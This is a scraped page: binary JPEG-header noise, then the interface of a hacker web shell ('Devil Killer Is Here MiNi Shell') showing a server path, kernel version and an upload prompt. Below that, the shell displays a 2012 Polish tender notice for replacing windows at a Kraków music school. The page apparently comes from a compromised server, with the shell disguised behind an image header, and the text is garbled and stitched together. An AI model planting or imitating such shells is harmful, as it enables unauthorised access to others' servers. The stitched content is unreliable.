JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120615/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120615/204274-N-2012.html

<p class="kh_header"><b>Kraków: Wymiana stolarki okiennej w budynku Państwowej Ogólnokształcącej Szkole Muzycznej II st im. F. Chopina mieszczącym się przy ul. Basztowej 6,  31-134 Kraków.</b><br>
<b>Numer ogłoszenia: 204274 - 2012; data zamieszczenia: 15.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowa Ogólnokształcąca Szkoła Muzyczna II st. im. Fryderyka Chopina , ul. Basztowa 6, 31-134 Kraków, woj. małopolskie, tel. 12 422 20 23, faks 12 421 62 92.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szkolamuzyczna.os.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Publiczna Szkoła Arrtystyczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wymiana stolarki okiennej w budynku Państwowej Ogólnokształcącej Szkole Muzycznej II st im. F. Chopina mieszczącym się przy ul. Basztowej 6,  31-134 Kraków..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> wymiana stolarki okiennej w budynku Państwowej Ogólnokształcącej Szkole Muzycznej II st im. F. Chopina mieszczącym się przy ul. Basztowej 6,  31-134 Kraków w następującym  zakresie:
a)	elewacji frontowej południowej:
- 	7 okien znajdujących  się na I piętrze 		symbol okna Oa9
- 	4 okna znajdujące się na parterze 			symbol okna Oa6
- 	4 okna znajdujące się w piwnicy 			symbol okna Oa3;
b)	elewacji wschodniej:
- 	6 okien znajdujących  się w piwnicy 			symbol okna Oa1
-	12 okien znajdujących się na parterze 		symbol okna Oa5
- 	11 okien znajdujących  się na I piętrze 		symbol okna Oa7
-	 7 okien znajdujących  się na II piętrze 		symbol okna Oa10
-	3 okien znajdujących  się na II piętrze  		symbol okna Oa11;
c)	elewacji  zachodniej:
	-	5 okien znajdujących  się na parterze 		symbol okna Oa1
	- 	6 okien znajdujących  się na I piętrze 		symbol okna Oa7.


Budynek szkoły  wpisany jest do rejestru  zabytków pod numerem A-183.

Zakres zamówienia obejmuje wszystkie czynności umożliwiające i mające na celu wykonanie w ww. częściach budynku szkoły demontażu starych okien i montażu nowych z drewna klejonego z zachowaniem kształtu i podziału istniejących okien w szczególności:
- 	demontaż istniejących okien drewnianych, parapetów zewnętrznych i  wewnętrznych;
- 	transport nowych okien i parapetów;
- 	wywóz elementów demontowanych,  wywóz i utylizacja gruzu;
- 	wykonanie i montaż nowych okien drewnianych. 
Górna część okna drewnianego  zespolonego uchylna poprzez mechanizm, lewe skrzydło rozwieralno-uchylne, prawe skrzydło rozwieralne. 
Górna część okien skrzynkowych uchylna zintegrowana (zewn. oraz wewn.) poprzez mechanizm, prawe i lewo skrzydło otwieralne;
- 	wykonanie i montaż parapetów zewnętrznych i  wewnętrznych;
- 	zabezpieczenie elementów budynku przed uszkodzeniem;
- 	zabezpieczenie terenu budowy.

Szczegółowy opis przedmiotu zamówienia określa specyfikacja oraz:

a)	projekt budowlany pn.: Wymiana stolarki okiennej  Państwowej Ogólnokształcącej Szkole Muzycznej II stopnia  im. Fryderyka Chopina na działce nr 66/3 obr. 119 Śródmieście Kraków, ul. Basztowa 6, autorstwa mgr inż. arch. Ludomira Książka.
b)	specyfikacja techniczna wykonania i odbioru robót, zwana dalej STWiOR,
c)	pozwolenie konserwatorskie nr 67/11,
d)	przedmiar robót;
stanowiące  załącznik nr 1.

Zastrzeżenie:

Dokumentacja projektowa (projekt, przedmiar, STWiOR) opisują przedmiot zamówienia tylko  i wyłącznie w części odpowiadającej następującemu zakresowi:
a)	elewacji frontowej południowej:
- 	7 okien znajdujących  się na I piętrze 		symbol okna Oa9
- 	4 okna znajdujące się na parterze 		symbol okna Oa6
- 	4 okna znajdujące się w piwnicy 		symbol okna Oa3;
b)	elewacji wschodniej:
- 	6 okien znajdujących  się w piwnicy 		symbol okna Oa1
-	12 okien znajdujących się na parterze 	symbol okna Oa5
- 	11 okien znajdujących  się na I piętrze 	symbol okna Oa7
-	 7 okien znajdujących  się na II piętrze 	symbol okna Oa10
-	3 okien znajdujących  się na II piętrze  	symbol okna Oa11;
c)	elewacji  zachodniej:
	-	5 okien znajdujących  się na parterze 	symbol okna Oa1
	- 	6 okien znajdujących  się na I piętrze 	symbol okna Oa7


Pozostała część stolarki okiennej opisana w dokumentacji projektowej nie wchodzi  w zakres niniejszego postępowania i nie podlega wycenie przez Wykonawcę.

Ze względu na ryczałtowy charakter wynagrodzenia przedmiar robót pełni jedynie dodatkową,  informacyjną/ pomocniczą rolę dla wykonawcy robót budowlanych.
Wykonawca przed przystąpieniem do realizacji zamówienia zobowiązany jest  dokonać rzeczywistych pomiarów okien w obiekcie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiajacy przewiduje udzielenie zamówień uzupełniajacych stanowiących nie więcej niż 50 % zamówienia podstawowego, o których mowa w  art. 67 ust. 1 pkt 6 ustawy Prawo zamówień publicznych z dnia 29 stycznia 2004r. (tekst jedn.: Dz.U 10.113.759 ze zm).
Zakresem zamówień uzupełniających przewiduje Zamawiajacy objąć wymiane stoaalrki okiennej w pozostałych pomieszczeniach szkoły.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.42.11.32-8, 45.45.30.00-7, 45.11.12.20-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 63.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy nie określa warunku  udziału  w postepowaniu. Wykonawca składa oświadczenie o spelnianiu  warunków udziału  w postepowaniu o których w art  22 ust. 1 ustawy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Do postępowania przetargowego zostaną dopuszczeni Wykonawcy spełniający warunki udziału w postępowaniu, dotyczące:

a) posiadania wiedzy i doświadczenia, tj.
 - zrealizowali w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie minimum 1 robotę budowlaną polegającą na wymianie stolarki okiennej w obiekcie zabytkowym, o wartości co najmniej 100.000,00 zł brutto. 
Wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu przedstawią następujące dokumenty:
-  wykaz zrealizowanej w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie min. 1 roboty budowlanej, polegającej na wymianie stolarki okiennej w obiekcie zabytkowym, o wartości co najmniej 100.000,00 zł brutto wraz z dokumentami potwierdzającymi, że robota ta została wykonana zgodnie z zasadami sztuki budowlanej i prawidłowo ukończona .
W przypadku  Wykonawców wspólnie ubiegających  się o udzielenie zamówienia publicznego przedmiotowy  warunek może zostac spełniony łącznie przez tych Wykonawców.
Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest:
- udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy nie określa warunku  udziału  w postepowaniu. Wykonawca składa oświadczenie o spelnianiu  warunków udziału  w postepowaniu o których w art  22 ust. 1 ustawy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Do postępowania przetargowego zostaną dopuszczeni Wykonawcy spełniający warunki udziału w postępowaniu, dotyczące: 
dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, tj.: 
- kierownik budowy:
posiada uprawnienia budowlane w specjalności konstrukcyjno-budowlanej do kierowania robotami budowlanymi;
posiada uprawnienia do prowadzenia robót budowlanych w obiektach zabytkowych określone w §24.2. rozporządzenia Ministra Kultury z dnia 27.07.2011 r. w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych (Dz.U. 2011. 165. 987).
Wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu przedstawią następujące dokumenty:
- wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia  wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, zakresu wykonywanych przez nich czynności oraz podstawie dysponowania ww. osobami,
- oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia
posiadają wymagane prawem uprawnienia w następującym zakresie:
kierownik budowy:
posiada uprawnienia budowlane w specjalności konstrukcyjno-budowlanej do kierowania robotami budowlanymi oraz posiada uprawnienia do prowadzenia robót budowlanych w obiektach zabytkowych określone w §24.2. rozporządzenia Ministra Kultury z dnia 27.07.2011 r. w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych (Dz.U. 2011. 165. 987).

W przypadku  Wykonawców wspólnie ubiegających  się o udzielenie zamówienia publicznego przedmiotowy  warunek może zostac spełniony łącznie przez tych Wykonawców.
Przez posiadanie uprawnień budowlanych wymaganych prawem dla osób uczestniczących w realizacji zamówienia rozumie się uprawnienia do wykonywania samodzielnych funkcji w budownictwie w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane Dz. U. 2003, Nr 207, poz. 2016 ze zm.
Uprawnienia budowlane nazwy specjalności i ich zakresy będą rozpatrywane zgodnie z przepisami regulującymi nadawanie uprawnień budowlanych w dacie ich nadania.	
W zakresie przedmiotowego warunku udziału w postępowaniu  w odniesieniu do obywateli państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej lub państwa członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA), uprawnienia do wykonywania zawodu muszą spełniać warunki określone w ustawie o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej Dz.U.08.63.394. 
Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest:
- udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Do postępowania przetargowego zostaną dopuszczeni Wykonawcy spełniający warunki udziału w postępowaniu, dotyczące sytuacji ekonomicznej i finansowej, tj.: 

są ubezpieczeni od  odpowiedzialności cywilnej w zakresie prowadzonej  działalności związanej z przedmiotem zamówienia na kwotę minimum 200.000,00 zł. od jednego zdarzenia.

Wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu przedstawią następujące dokumenty:
opłacona polisa a w przypadku jej braku inny dokument potwierdzający, że       Wykonawca jest ubezpieczony od  odpowiedzialności cywilnej w zakresie prowadzonej  działalności związanej z przedmiotem zamówienia na wartość minimum  200.000,00 zł od jednego zdarzenia.

W przypadku  Wykonawców wspólnie ubiegających  się o udzielenie zamówienia publicznego przedmiotowy  warunek może zostac spełniony łącznie przez tych Wykonawców.
Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest:
- udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Skrócenie terminu  wykonania zamówienia - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje i zastrzega sobie prawo do wprowadzenie zmiany w treści umowy w zakresie:
terminów  określonych umową i jej załącznikami z wyłączeniem sytuacji w których zmiana terminu  związana jest ze zwłoką w wykonywaniu umowy przez wykonawcę. Zmiana terminów wykonania może dotyczyć przedłużenia okresu realizacji robót na wniosek zamawiającego z przyczyn organizacyjnych (w szczególności funkcjonowanie budynku w  okresie roku  szkolnego). 
W takim przypadku wykonawca sporządzi nowy harmonogram robót uwzględniający realizacje umowy w zmienionym terminie a z tego tytułu nie przysługują mu dodatkowe koszty;
zakresu zamówienia  - roboty zaniechane  na następujących  warunkach:
a) zmiany w przypadku konieczności rezygnacji z pewnego  zakresu robót. 
W przypadku odstąpienia od całego elementu robót określonego w harmonogramie rzeczowo-finansowym, nastąpi odliczenie wartości tego elementu określonego w tym harmonogramie od ogólnej wartości przedmiotu umowy;
b)	 w przypadku odstąpienia od części robót z danego elementu określonego w harmonogramie obliczenie niewykonanej części tego elementu nastąpi na podstawie ustalenia, przez Zamawiającego i Wykonawcę, procentowego stosunku niewykonanych robót do wartości całego elementu; następnie zostanie wyliczona wartość niewykonanych robót i odliczona od ogólnej wartości przedmiotu umowy; 

c) zmiany ceny w przypadku:
 - zmiany ustawowej stawki podatku VAT, w takim przypadku cena netto określona w   
ofercie pozostaje bez zmian,
- w przypadku wprowadzenia zmian o których mowa w  ppkt a, b;
d) zmiany osób realizujących zamówienie pod warunkiem wykazania przez wykonawcę     wskazane przez niego osoby posiadają kwalifikacje nie mniejsze niż osoby wymienione  w ofercie.
e)	postanowień umowy, których treść musi być zmieniona z powodu okoliczności siły wyższej:
-  np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można była przewidzieć z pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach,
- z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są zawinione przez którąkolwiek ze stron,
-  gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy;
- gdy wydane zostaną w  trakcie wykonywanych robót  decyzje organów administracji państwowej mające wpływ na realizacje umowy.

Wniosek o zmianę przysługuje w ww. zakresie odpowiednio zamawiającemu i wykonawcy.
Zamawiający na powyższy zakres przedłoży propozycję zmiany umowy w formie aneksu, którą to WYKONAWCA jest związany i nie przysługują mu w tym zakresie żadne roszczenia do zamawiającego co do kwoty umownej, ewentualnego odszkodowania z tytułu utraty spodziewanych zysków. 
2. 3.	Procedura wprowadzania wszystkich zmian do umowy określonych w niniejszej umowie. Wniosek o zmianę każdorazowo musi zawierać:
1)	opis proponowanej zmiany,
2)	 wpływ na wykonanie robót stanowiących przedmiot umowy - np.: czas, personel, rezygnacja z części prac itp.
3)	 proponowany termin wprowadzenia zmian, 
4)	należy podać  jakie znaczenie ma zmiana  dla zamawiającego lub czy jest konieczna dla wykonania umowy.
Wniosek o zmianę składany musi być złożony przez stronę umowy w terminie minimum 3 dni przed planowanym wprowadzeniem zmian.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szkolamuzyczna.os.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Basztowa 6, 31-134 Kraków.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.07.2012 godzina 15:15, miejsce: PAŃSTWOWA OGÓLNOKSZTAŁCĄCA SZKOŁA MUZYCZNA II ST. IM. FRYDERYKA CHOPINA W KRAKOWIE,  ul. Basztowa 6, 31-134 Kraków - sekretariat I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Termin realizacji zamówienia:  
do  63 dni kalendarzowych od daty zawarcia umowy.
Za termin wykonania zamówienia uznaje się dzień podpisania przez strony bezusterkowego protokołu  odbioru robót.

W terminie do 2 dni roboczych od daty zawarcia umowy Wykonawca sporządzi i uzgodni  z zamawiającym harmonogram robót z uwzględnieniem warunków realizacji w szczególności:
-	dostępności obiektu w dni tygodnia od poniedziałku do soboty;
- 	w  przypadku kiedy termin  realizacji przypadnie na miesiąc wrzesień, dostępność obiektu będzie utrudniona z uwagi charakter obiektu (brak dostępu  do  wszystkich  sal jednocześnie), który przez okres wykonywania robót będzie czynny wobec osób pracujących i uczniów uczestniczących  w zajęciach. Pomieszczania w których Wykonawca wykonywał będzie roboty będą udostępniane w zależności od zajęć odbywających  się w  poszczególnych  salach. 
Harmonogram uzgodniony  z zamawiającym ma zawierać co najmniej informacje w  jakich dniach, godzinach i w jakich pomieszczeniach wykonywane będą roboty..</p>
